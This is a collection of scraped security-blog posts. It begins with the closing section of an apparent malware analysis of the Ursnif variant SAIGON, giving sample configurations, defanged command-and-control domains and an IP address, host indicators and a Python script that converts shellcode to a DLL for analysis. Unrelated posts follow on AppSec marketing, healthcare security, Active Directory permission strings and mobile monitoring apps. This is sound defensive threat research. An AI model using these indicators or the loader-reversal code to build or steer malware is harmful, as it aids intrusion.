Figure 4: Ursnif v3 mimicking (red) previously seen benign browser traffic (green) not seen in SAIGON samples 

Implications

It is currently unclear whether SAIGON is representative of a broader evolution in the Ursnif malware ecosystem. The low number of SAIGON samples identified thus far—all of which have compilations timestamps in 2018—may suggest that SAIGON was a temporary branch of Ursnif v3 adapted for use in a small number of operations. Notably, SAIGON’s capabilities also distinguish it from typical banking malware and may be more suited toward supporting targeted intrusion operations. This is further supported via our prior identification of SAIGON on a server that hosted tools used in point-of-sale intrusion operations as well as VISA’s recent notification of the malware appearing on a compromised hospitality organization’s network along with tools previously used by FIN8.

Acknowledgements

The authors would like to thank Kimberly Goody, Jeremy Kennelly and James Wyke for their support on this blog post.

Appendix A: Samples

The following is a list of samples including their embedded configuration:

Sample SHA256: 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:30
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:41
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f593518a2cf4915
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e
Sample Version: 3.50.199
PE Timestamp: 2018-11-15T11:17:09
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com

Group / Botnet ID: 1000
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 60
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b15
02ccb5c021c565359255265e0ca015290112f3b6cb72c7863309480f749e38b7d955e410cb53fb3ecf7c403f5
93518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9
Sample Version: 3.50.209
PE Timestamp: 2018-12-04T10:47:56
XOR Cookie: 0x40d822d9
C2 URLs

  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

Botnet ID: 1000
Server Key: 0123456789ABCDEF
Idle Period: 20
Minimum Uptime: 300
Load Period: 1800
Host Keep Time: 360
RSA Public Key: (0xdb7c3a9ea68fbaf5ba1aebc782be3a9e75b92e677a114b52840d2bbafa8ca49da40a64664d80cd62d9453
34f8457815dd6e75cffa5ee33ae486cb6ea1ddb88411d97d5937ba597e5c430a60eac882d8207618d14b660
70ee8137b4beb8ecf348ef247ddbd23f9b375bb64017a5607cb3849dc9b7a17d110ea613dc51e9d2aded, 0x10001)

Appendix B: IOCs

Sample hashes:

  • 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
  • c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
  • 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e [VT]
  • 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9 [VT]

C2 servers:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com
  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com
  • http://softcloudstore[.]com
  • http://146.0.72.76
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

User-Agent:

  • "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0"

Other host-based indicators:

  • "Power<random_string>" scheduled task
  • "PsRun" value under the HKCU\Identities\{<random_guid>} registry key

Appendix C: Shellcode Converter Script

The following Python script is intended to ease analysis of this malware. This script converts the SAIGON shellcode blob back into its original DLL form by removing the PE loader and restoring its PE header. These changes make the analysis of SAIGON shellcode blobs much simpler (e.g. allow loading of the files in IDA), however, the created DLLs will still crash when run in a debugger as the malware still relies on its (now removed) PE loader during the process injection stage of its execution. After this conversion process, the sample is relatively easy to analyze due to its small size and because it is not obfuscated.

#!/usr/bin/env python3
import argparse
import struct
from datetime import datetime

MZ_HEADER = bytes.fromhex(
    '4d5a90000300000004000000ffff0000'
    'b8000000000000004000000000000000'
    '00000000000000000000000000000000'
    '00000000000000000000000080000000'
    '0e1fba0e00b409cd21b8014ccd215468'
    '69732070726f6772616d2063616e6e6f'
    '742062652072756e20696e20444f5320'
    '6d6f64652e0d0d0a2400000000000000'
)

def main():
    parser = argparse.ArgumentParser(description="Shellcode to PE converter for the Saigon malware family.")
    parser.add_argument("sample")
    args = parser.parse_args()

    with open(args.sample, "rb") as f:
        data = bytearray(f.read())

    if data.startswith(b'MZ'):
        lfanew = struct.unpack_from('=I', data, 0x3c)[0]
        print('This is already an MZ/PE file.')
        return
    elif not data.startswith(b'\xe9'):
        print('Unknown file type.')
        return

    struct.pack_into('=I', data, 0, 0x00004550)
    if data[5] == 0x01:
        struct.pack_into('=H', data, 4, 0x14c)
    elif data[5] == 0x86:
        struct.pack_into('=H', data, 4, 0x8664)
    else:
        print('Unknown architecture.')
        return

    # file alignment
    struct.pack_into('=I', data, 0x3c, 0x200)

    optional_header_size, _ = struct.unpack_from('=HH', data, 0x14)
    magic, _, _, size_of_code = struct.unpack_from('=HBBI', data, 0x18)
    print('Magic:', hex(magic))
    print('Size of code:', hex(size_of_code))

    base_of_code, base_of_data = struct.unpack_from('=II', data, 0x2c)

    if magic == 0x20b:
        # base of data, does not exist in PE32+
        if size_of_code & 0x0fff:
            tmp = (size_of_code & 0xfffff000) + 0x1000
        else:
            tmp = size_of_code
        base_of_data = base_of_code + tmp

    print('Base of code:', hex(base_of_code))
    print('Base of data:', hex(base_of_data))

    data[0x18 + optional_header_size : 0x1000] = b'\0' * (0x1000 - 0x18 - optional_header_size)

    size_of_header = struct.unpack_from('=I', data, 0x54)[0]

    data_size = 0x3000
    pos = data.find(struct.pack('=IIIII', 3, 5, 7, 11, 13))
    if pos >= 0:
        data_size = pos - base_of_data

    section = 0
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.text',
        size_of_code, base_of_code,
        base_of_data - base_of_code, size_of_header,
        0, 0,
        0, 0,
        0x60000020
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.rdata',
        data_size, base_of_data,
        data_size, size_of_header + base_of_data - base_of_code,
        0, 0,
        0, 0,
        0x40000040
    )
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        b'.data',
        0x1000, base_of_data + data_size,
        0x1000, size_of_header + base_of_data - base_of_code + data_size,
        0, 0,
        0, 0,
        0xc0000040
    )

    if magic == 0x20b:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.pdata',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0x40000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1600, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0xc0000040
        )
    else:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.bss',
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
            0xc0000040
        )
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            b'.reloc',
            0x2000, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
            0x40000040
        )

    header = MZ_HEADER + data[:size_of_header - len(MZ_HEADER)]
    pe = bytearray(header + data[0x1000:])
    with open(args.sample + '.dll', 'wb') as f:
        f.write(pe)

    lfanew = struct.unpack_from('=I', pe, 0x3c)[0]
    timestamp = struct.unpack_from('=I', pe, lfanew + 8)[0]
    print('PE timestamp:', datetime.utcfromtimestamp(timestamp).isoformat())

 

if __name__ == "__main__":
    main()

Did You Read Our Most Popular 2019 Blog Posts?

What were your biggest AppSec questions and concerns in 2019? Want to find out what others??? were? Every January, we look at the most-read blog posts from the previous year, and it always proves to be a valuable exercise for us, and we hope for you as well. The posts below were favorites among our readers in 2019 and highlight the software security issues that were top of mind. Their popularity could also stem from the very practical advice they contain; we got the message, look for more of the same in 2020!

Detailed information on vulnerabilities and exploits ??? and how to prevent and avoid

The blog posts below contain detailed explanations of vulnerabilities and exploits from our own research team and penetration testers. Clearly, there is an appetite for a first-hand closer look at how developers are creating vulnerabilities, and how attackers are exploiting them.

Exploiting Spring Boot Actuators

Exploiting JNDI Injections in Java

Data Extraction to Command Execution CSV Injection

The Top Five Web Application Authentication Vulnerabilities We Find

Managing open source risk

As in the past several years, blog posts on open source risk, and how Veracode helps to reduce it, landed in the top 10.

Introducing New Veracode Software Composition Analysis

How Veracode Scans Docker Containers for Open Source Vulnerabilities

Complying with AppSec regulations

As major data breaches continue to expose customers??? sensitive data and cause major monetary and reputation damage to organizations, regulators are taking notice. From the EU General Data Protection Regulation (EU GDPR) to the NY State Department of Financial Services (NY DFS) Cybersecurity Regulations, more regulations are including application security requirements, and complying with them is becoming a major driver for security professionals. In turn, two blog posts about cybersecurity regulations were featured on the most-read list for 2019.

PCI Releases Software Security Framework

Ohio Senate Bill 220 Incentivizes Businesses to Maintain Higher Levels of Cybersecurity

Subscribe to our content

Did you miss any of these posts last year? Don???t miss a thing in 2020; subscribe to our content.

NICE Released the Winter 2019-20 eNewsletter

The Winter 2019-20 NICE eNewsletter has been published to provide subscribers information on academic, industry, and government developments related to the National Initiative for Cybersecurity Education (NICE), updates from key NICE programs, projects, the NICE Working Group, and other important news. To help increase the visibility of NICE, the NICE Program Office will issue regular eNewsletters that feature spotlight articles on academic, industry, and government developments related to NICE, updates from key NICE programs, projects, the NICE Working Group, and other important news. For

Work in Healthcare? This is Why You Should Give Your Security a Checkup

Most patients practice preventative care through regular trips to the doctor, catching minor issues before they turn into major medical problems. So, why don???t more organizations follow suit with security testing to prevent breaches and fortify the safety of patient information?

Too often, remediation is an afterthought as developers scramble to patch holes in their systems post-breach. A recent report in the journal of Health Services Research suggests that this herculean effort can put a strain on patient health when things slow down after a breach and new security measures are introduced. However, preventative care can work in the security world just as it does for your health.

Less isn???t more in healthcare cybersecurity

Some experts and industry thought leaders see unfortunate breaches as opportunities to better understand what went wrong and how it can be prevented in the future. Unfortunately, information from these breaches sometimes muddies the tumultuous waters of cybersecurity and can cause panic over increased security procedures.

Josephine Wolff, assistant professor of cybersecurity policy at Tufts Fletcher School of Law and Diplomacy, found that the 2019 report published in the journal of Health Services Research draws dangerous conclusions about the negative impacts of mitigating cyberattacks in healthcare. The HSR paper proposes that lost passwords and associated security measures???like two-factor authentication???hold up patient care with increased wait times for ECGs and result in higher rates of fatal heart attacks. A point, they suggest, that should lead to less aggressive security efforts.

In her article, Wolff proposes that a slower remediation process is precisely why more medical institutions should view this as a crucial pivot point, not a nuisance. She explains, ???Undoubtedly, IT upgrades and updates can inconvenience workers and slow down operations in any workplace, but that is a reason to develop techniques and processes for implementing them more smoothly???not to write them off as harmful and counterproductive.??? Even the most basic preventive actions are crucial best practices, and they???re just a starting point.

The cyberattack epidemic in healthcare

Data from the last decade shows just how damaging breaches can be for institutions and patients alike. According to HIPAA Journal, there were 2,546 healthcare breaches from 2009 to 2018 that exposed over 180,000,000 patient records to attackers, resulting in costly settlements and fines for HIPAA violations. Additionally, figures from the Protenus 2019 Breach Barometer report reveal that in 2018 alone, the healthcare sector saw a whopping 15,085,302 patient records breached???a number that nearly tripled from 2017 to 2018. 

These trends are alarming but important to watch. Our 10th annual State of Software Security (SOSS) report examines trends in various industries, including healthcare, and the data sheds some light on why it???s so crucial for organizations to get a jump on security measures. 

Healthcare Security Rank

We found that healthcare institutions have the highest prevalence of severe flaws at 52 percent and are the slowest to fix said flaws, with a median time-to-remediation (MedianTTR) of 131 days. All this typically contributes to security debt, which accumulates over time as more and more flaws are left uncorrected.

Daunting security debt is a problem that your DevOps team can tackle with the right processes in place, including a steady cadence of scans. Our SOSS report found that those who conduct up to 12 scans per year have a MedianTTR of 68 days, while those who scan more than 260 times per year have a MedianTTR of just 19 days (that???s a substantial 72 percent reduction in remediation time).

Increasing the regularity of your scans can have a lasting impact on security debt. In fact, we found that frequent scanners carry 5x less security debt than sporadic scanners who lack a reliable testing process. The remedy is clear: scanning often and speeding up fix rates to mitigate severe flaws will cause far fewer headaches in the future and, ultimately, prevent downtrends in patient care.

A process-minded prognosis

The good news in this year???s SOSS report is that healthcare institutions have a fix rate of 72 percent, which is decent when compared to other industries. Still, hospitals and healthcare providers must stay on top of application scanning to increase frequency and efficiency, cutting down their MedianTTR.

The solution? Shifting DevSecOps behaviors from reactive to proactive through keener code management and more thorough remediation processes. This entails making sure security programs:

  • Include a trained team of security-minded developers
  • Cover all applications across your health organization
  • Include a frequent and steady scanning cadence
  • Have ample resources developers can tap into for testing and fixes
  • Are adaptable enough to handle shifting landscapes in cybersecurity
  • Are equipped to cover third-party vendors used by the organization

Taking steps towards a well-rounded security program not only bolsters your defense against attacks but also sheds light on wrinkles in your remediation process that need ironing. With these measures in place, if a breach or a cyberattack occurs, your healthcare organization will be better equipped to handle issues with minimal to no impact on patient care.

Learn more about cybersecurity in healthcare

Like what you see? Find more info about the state of cybersecurity for healthcare by downloading our SOSS Volume 10 Industry Snapshot, and then check out the full report to keep a pulse on the shifts in DevSecOps over the last ten years. 

 

 

For privacy, 2020 is not for hindsight

It has been an exciting few years for privacy. The passing and enforcement of new laws (such as CCPA and GDPR) and modifications made to others have caused a flurry of activity across organizations of all sizes. Decisions have been made about how meeting the laws’ requirements by changing procedures and policies. Now it is […]

The post For privacy, 2020 is not for hindsight appeared first on Privacy Ref.

CCPA and University Surveillance Apps

It’s the turn of a new decade and a new privacy law has gone into effect — the California Consumer Privacy Act or CCPA. A quick check with some of my fellow privacy pros on how many consumer information requests received at the end of the day on Jan. 1, puts retail at higher numbers […]

The post CCPA and University Surveillance Apps appeared first on Privacy Ref.

Who Needs WMDs (Weapons of Mass Destruction) Today ?

Folks,

Today, yet again, I'd like to share with you a simple Trillion $ question, one that I had originally asked more that 10 years ago, and recently asked again just about two years ago. Today it continues to be exponentially more relevant to the whole world.

In fact, it is more relevant today than ever given the paramount role that cyber security plays in business and national security.


So without further adieu, here it is - Who needs WMDs (Weapons of Mass Destruction) Today?


Ans: Only those who don't know that we live in a digital world, one wherein virtually everything runs on (networked) computers.


Why would an entity bother trying to acquire or use a WMD (or for that matter even a conventional weapon) when (if you're smart) you could metaphorically stop the motor of entire organizations (or nations) with just a few lines of code designed to exploit arcane but highly potent misconfigured security settings (ACLs) in the underlying systems on which governments, militaries and thousands of business organizations of the world operate?

Today, all you need is two WDs in the same (pl)ACE and its Game Over.


Puzzled? Allow me to give you a HINT:.

Here’s a simple question: What does the following non-default string represent and why should it be a great cause of concern?
(A;;RP;;;WD)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(A;;RPLCLORC;;;AU)(A;;RPWPCRLCLOCCRCWDWOSW;;;DA)(A;CI;RPWPCRLCLOCCRCWDWOSDSW;;;BA)(A;;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;SY)(A;CI;RPWPCRLCLOCCDCRCWDWOSDDTSW;;;EA)(A;CI;LC;;;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU) (A;CI;RPWDLCLO;;;WD)(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;RU) (OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RPLCLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(A;;RC;;;RU)(OA;CIIO;RPLCLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)

Today, this one little question and the technicality I have shared above directly impacts the cyber security of the entire world.


If you read my words very carefully, as you always should, then you'll find that it shouldn't take an astute cyber security professional more than a minute to figure it out, given that I’ve actually already provided the answer above.


Today, the CISO of every organization in the world, whether it be a government, a military or a billion dollar company (of which there are dime a dozen, and in fact thousands worldwide) or a trillion dollar company MUST know the answer to this question.


They must know the answer because it directly impacts and threatens the foundational cyber security of their organizations.

If they don't, (in my opinion) they likely shouldn't be the organization's CISO because what I have shared above could possibly be the single biggest threat to 85% of organizations worldwide, and it could be used to completely compromise them within minutes (and any organization that would like a demo in their real-world environment may feel free to request one.)

Some of you will have figured it out. For the others, I'll finally shed light on the answer soon.

Best wishes,
Sanjay


PS: If you need to know right away, perhaps you should give your Microsoft contact a call and ask them. If they too need some help (they likely will ;-)), tell them it has to do with a certain security descriptor in Active Directory. (There, now that's a HINT the size of a domain, and it could get an intruder who's been able to breach an organization's network perimeter to root in seconds.)

PS2: If this intrigues you, and you wish to learn more, you may want to read this - Hello World :-)

Veracode CEO Sam King Recognized in WomenInc. Magazine’s 2019 Top Influential Corporate Directors

We???re thrilled to announce that Veracode Chief Executive Officer Sam King has been named one of WomenInc. Magazine???s 2019 Most Influential Corporate Directors!

Honoring influencers, achievers, and executives, this announcement recognizes women who are making notable contributions to the world of business and technology. The list compiled by WomenInc. Magazine includes over 700 directors serving on the boards of S&P 1000/Mid-Cap publicly held companies.

To celebrate these accomplished leaders, WomenInc. maintains an exclusive online directory of honorees and publishes their yearly announcement in seasonal editions of the magazine.

King is recognized for her contributions on behalf of Progress Software, the leading provider of application development and digital experience technologies. Since joining the Board of Directors in February 2018, she has contributed to the implementation of Progress??? business strategy as well as its charter to operate as a socially responsible organization.

She is also a well-known expert in cybersecurity and is a founding member of the Veracode team. She helped lead the establishment and evolution of the application security category alongside industry experts and analysts. Veracode is the largest independent application security provider worldwide, valued at $1 billion.

???It is essential that the achievements and success of professional women are showcased in the highest regard and their stories are told in meaningful ways,??? said Catrina Young, the Executive Vice President and Chief Communications Officer of WomenInc. ???We are proud that we can recognize this distinguished group of women and we are inspired by their accomplishments, their distinguished careers and the corporations that demonstrate an inclusive board composition. We offer our congratulations.???

Encouraging positive dialogue from influential female voices in leadership, WomenInc. Magazine is a media platform dedicated to fostering the ideas, events, social commentary, and stories that inspire professional women.

To see the full list of honorees, visit the directory here or grab a copy of WomenInc.???s winter issue from your local newsstand.

Security at DevOps Speed: How Veracode Reduces False Positives

Originally Published on November 27, 2017 -- Updated on January 7, 2020

Application security solutions that slow or stall the development process simply aren???t feasible in a DevOps world. AppSec will increasingly need to fit as seamlessly as possible into developer processes, or it will be under-used or overlooked. But overlooking AppSec puts your organization at high risk of a damaging breach. Our most recent State of Software Security report found that a whopping 83 percent of apps had at least one vulnerability on initial scan. Leaving your code vulnerable leaves your organization open to breach. In the end, you need AppSec, but you also need AppSec that developers will use. Reduction of false positives is a big part of this requirement. False positives are always a key concern because they make developers and security folks spin their wheels, so solutions should minimize them as much as possible.

How Veracode Works to Reduce False Positives

We aim for full automation and high speeds for all of our scans, but that doesn???t mean that we compromise on quality. Unique to our position as a SaaS provider, our security research team regularly samples customer app submissions to manually review flaws. This ensures that we have met our standards for accuracy in terms of both false positives and negatives. By reviewing actual customer apps, we get a much broader and realistic set of cases than would be possible in a QA lab that only tests applications built as internal test cases.

Our review of these applications leads to improvements that are implemented back into our static analysis engine

The SaaS Advantage

As a native SaaS provider, Veracode has a strategic advantage in improving false-positive rates. To date, we???ve assessed over 13.5 trillion lines of code and performed more than 4 million scans, and with every release, our solution gets smarter. On-premises solutions, on the other hand, require their customers to manually create custom rules to adjust for false positives in their vendor???s software, which can be very time consuming and complicated, or to wait for their on-premises vendor to release a new revision to the scanner, which requires downtime and unplanned work for the security teams. We at Veracode improve our static analysis engine at least monthly, and improvements we have made by observing the behavior of all customer applications are available with minimal disruption to your processes.

The result for our customers is that they get very high quality at high speeds (89 percent of our scans finish in less than an hour), without having to train and maintain a team for customizing scan rules to avoid false positives. This rule customization can be costly and time consuming, and requires a skill set that is hard to come by. In addition, customizations can be challenging to maintain if the person who wrote the code leaves the company. Finally, rule customization can muddy results for attestations ??? it???s hard to prove to third parties that your apps are secure if anyone can rig the results by manipulating rules.

On the other hand, our false-positive rate is a low 1.1 percent ??? with zero rule customizing. This 1.1 percent false positive rate across real-world applications is verified and based on feedback from our customers on vulnerabilities they have reviewed. By comparison, our competitors claim a 32 percent false positive rate.

Bottom Line

The Veracode solution has scanned hundreds of thousands of enterprise, mobile and cloud-based apps, and we???ve helped our customers fix more than 48 million flaws. Bottom line? Better analytics, faster improvements, increased accuracy and the ability to create more software, more securely than ever before.

Find out more about the Veracode Application Security solution.

Cybercrime is moving towards smartphones – this is what you could do to protect your company

By 2021, cybercrimes will cost companies USD 6 trillion, according to a study.

The number of internet users has grown from an estimated at 2 billion in 2015 to 4.4 billion in 2019, but so have the cybercrimes which are expected to cost companies USD 6 trillion worldwide, according to a study by Cybersecurity Ventures.

Similarly, the number of smartphone users has grown from 2.5 billion in 2016 to 3.2 billion in 2019 and is forecasted to grow to 3.8 billion by 2021. Smartphones and the internet will make further inroads to our economic system. But there are certain risks involved as well.

Mobile phones are becoming targets of cybercriminals because of their widespread use and increasing computing power. Consider the fact that more than 60 % of online fraud occurs through mobile phones. This threat is not just towards individual users but businesses as well. It does not matter how large the company is either. 43% of the cyberattacks in 2019 were aimed at smaller businesses because they do not have adequate protection.

Given how vulnerable smartphones are and that the threat from cyber attacks is only expected to increase, here are some measures you can take to protect your business from cybercriminals:

Rethink BYOD:

Bring Your Own Devices (BYOD) offers several benefits to both the organization and employees. Such a policy allows employees at a company to use their mobile phones, tablets, or laptops for work, saving companies the hassle to purchase devices.

However, you need to rethink if you are saving more than what you are losing. Employees have confidential company information on their devices. Such a door into your organization can cost you heavily. Set aside the funds to obtain company devices for use by employees at the office. Consider such an investment as part of your cybersecurity strategy.

 

Cybersecurity assessments:

The cybersecurity threat landscape is ever-evolving due to the fast nature of innovation. Develop a comprehensive cybersecurity program that includes a regular assessment of your company’s security needs. Identify the strengths of your IT infrastructure against potential attacks, and do not let advances in technology or techniques take that away from you. Similarly, you should identify the vulnerabilities in your systems. Make sure any gaps in your defenses are appropriately plugged. A threat assessment should be an integral component of any cybersecurity policy.

Retrain staff:

Make sure that employees at your organization are informed and up to date on the latest in cyber threats. This way they can protect themselves and the company from cybercriminals. Even a single mistake by one employee can end up creating a door for individuals or groups wishing your company harm. All employees must be trained as a matter of policy. This way, they can identify phishing attacks and manage social engineering scams. Another factor your employees must be mindful of is resource monitoring. Suspicious resource use on company devices, whether it is excess internet or battery usage, should raise alarm bells. However, employees may not look into such things in detail because they do not own the devices. Train your staff to keep track of resource use too.

 

Employee monitoring:

Most organizations have some form of an employee monitoring policy and track their workers. If you haven’t done so already, develop such a policy, and keep your employees informed to ensure transparency. If you have decided to use company devices, you can opt to install monitoring apps on them. There are several modern monitoring apps currently available such as XNSPY. The app can keep track of online activities, generate a list of call logs, and remote control the device. Furthermore, you can track the location of the device in real-time, and use features such as geofencing and GPS history. There are other powerful features too, such as ambient recording, multimedia access, and online activity tracking. You can also wipe off all the data from a device in case of theft. Monitoring apps such as XNSPY should be a part of your strategy against cybercriminals.

 

Don’t forget physical infrastructure:

Cybersecurity may involve software updates and training policies, but making sure your physical infrastructure is safe is just as important. Re-evaluate how exposed your digital infrastructure is to physical access. Furthermore, go through the profiles of suppliers and vendors to vet them properly. A small door in any piece of equipment can let cybercriminals through and bypass your entire cybersecurity foundation. Be aware of this threat and make sure that suppliers work by following specific regulations.

Develop a threat monitoring policy:

Anticipating an attack and stopping it is an important part of comprehensive cybersecurity policy. Make sure that you are monitoring your digital infrastructure round the clock.

Invest in threat monitoring software and a team of professionals that can identify, track, and stop an attack.

The concept of designing a cybersecurity system as a fortification is changing to an adaptable system that can accommodate evolving security threats. Furthermore, a monitoring policy also needs to have a clear response plan.

Such a plan details what needs to happen and when in case of an attack. This ensures that there is a speedy response by your company against any threat.

 Conclusion:

Smartphones have become powerful enough that they can be considered as computers in their own right. While this has created scores of opportunities, there are also clear threats posed by cybercrime. These threats are only going to increase as the internet and smartphone use increases. While protecting your business against cyber criminals requires a considerable investment of time and money, it will pay off in the long run.

 

Clark Thomas is an expert in VOIP. He helps businesses both small and medium-sized, in implementing and adopting the best security methods for their organization and network. He gives great advice regarding and assists people in boosting the security measures for their website and business.  

The post Cybercrime is moving towards smartphones – this is what you could do to protect your company appeared first on CyberDB.

What is Active Directory? (Cyber Security 101 for the Entire World)

Folks,

Today is January 06, 2020, and as promised, here I am getting back to sharing perspectives on cyber security.


Cyber Security 101

Perhaps a good topic to kick off the year is by seeking to ask and answer a simple yet vital question - What is Active Directory?

You see, while this question may seem simple to some (and it is,) its one of the most important questions to answer adequately, because in an adequate answer to this most simple question lies the key to organizational cyber security worldwide.

The simple reason for this is that if you were to ask most CISOs or IT professionals, they'll likely tell you that Active Directory is the "phone book" of an organization's IT infrastructure, and while its true that at its simplest, it is a directory of all organizational accounts and computers, it is this shallow view that leads organizations to greatly diminish the real value of Active Directory to the point of sheer irresponsible cyber negligence because  "Who really cares about just a phone book?"

In fact, for two decades now, this has been the predominant view held by most CISOs and IT personnel worldwide, and sadly it is the negligence resulting from such a simplistic view of Active Directory that are likely the reason that the Active Directory deployments of most organizations remain substantially insecure and vastly vulnerable to compromise today.

Again, after all, who cares about a phone book?!




Active Directory - The Very Foundation of Organizational Cyber Security Worldwide

If as they say, a "A Picture is Worth a Thousand Words", perhaps I should paint you a very simple Trillion $ picture -


An organization's Active Directory deployment is its single most valuable IT and corporate asset, worthy of the highest protection at all times, because it is the very foundation of an organization's cyber security.

The entirety of an organization's very building blocks of cyber security i.e. all the organizational user accounts and passwords used to authenticate their people, all the security groups used to aggregate and authorize access to all their IT resources, all their privileged user accounts, all the accounts of all their computers, including all laptops, desktops and servers are all stored, managed and secured in (i.e. inside) the organization's foundational Active Directory, and all actions on them audited in it.

In other words, should an organization's foundational Active Directory, or a single Active Directory privileged user account, be compromised, the entirety of the organization could be exposed to the  risk of complete, swift and colossal compromise.



Active Directory Security Must Be Organizational Cyber Security Priority #1

Today, ensuring the highest protection of an organization's foundational Active Directory deployment must undoubtedly be the #1 priority of every organization that cares about cyber security, protecting shareholder value and business continuity.


Here's why - A deeper, detailed look into What is Active Directory ?


For anyone to whom this may still not be clear, I'll spell it out - just about everything in organizational Cyber Security, whether it be Identity and Access Management, Privileged Access Management, Network Security, Endpoint Security, Data Security, Intrusion Detection, Cloud Security, Zero Trust etc. ultimately relies and depends on Active Directory (and its security.)



In essence, today every organization in the world is only as secure as is its foundational Active Directory deployment, and from the CEO to the CISO to an organization's shareholders, employees and customers, everyone should know this cardinal fact.

Best wishes,
Sanjay.

Top 9 challenges IT leaders will face in 2020

This year will assuredly see tech leaders laser-focused once again on digital initiatives, but the processes they have in place for doing so won’t be a slam dunk for success. Worse, recent research suggests that mistakes born of digital transformation are a top cause of concern for businesses. 

A Gartner report on emerging risks shows that while companies continue to prioritize and fund digital initiatives, two-thirds not only fail to deliver on their promises but also reveal “enterprise weaknesses, causing organizations to see a gap between expectations and results.”

To read this article in full, please click here

(Insider Story)

